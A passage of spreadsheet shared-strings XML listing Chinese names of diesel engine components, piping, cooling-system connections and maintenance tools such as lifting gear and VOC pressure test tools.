        <charset val="134"/>
      </rPr>
      <t>排气侧主管组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧泄放管组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出口主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形圈密封管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洁管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗管导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴水分离器排水</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>储水盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴水分离器前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽水分离器泄放管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴水分离器试车台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>天然水冷却系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>级水冷却系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水分流管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵低温进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵低温出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机低温进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机低温出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油冷却器低温出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器低温进出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器高温进出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器高温出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压空气冷却器低温出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器入口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵高温出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器淡水入口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机高温入口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵高温进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集管支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器润滑油系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>烟总管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>烟总管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>烟总管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气总管一侧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气总管内部拆卸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部格栅</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母拉紧气动工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关闭接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架吊装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机部件提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机总成提升</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底平面提升总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机提升方案</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">2  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机提升方案</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">3  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机提升方案</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">4  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机包装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器导向力</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀压力测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块压力测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口压力测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量控制压力测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块清洗工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油泄放测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车阀测试工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变速箱取出器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元检查工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>V23H</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>26MTB-40</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>26MTB-40V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>S28H</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>U28H</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>U45H</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>S50</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>U50</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
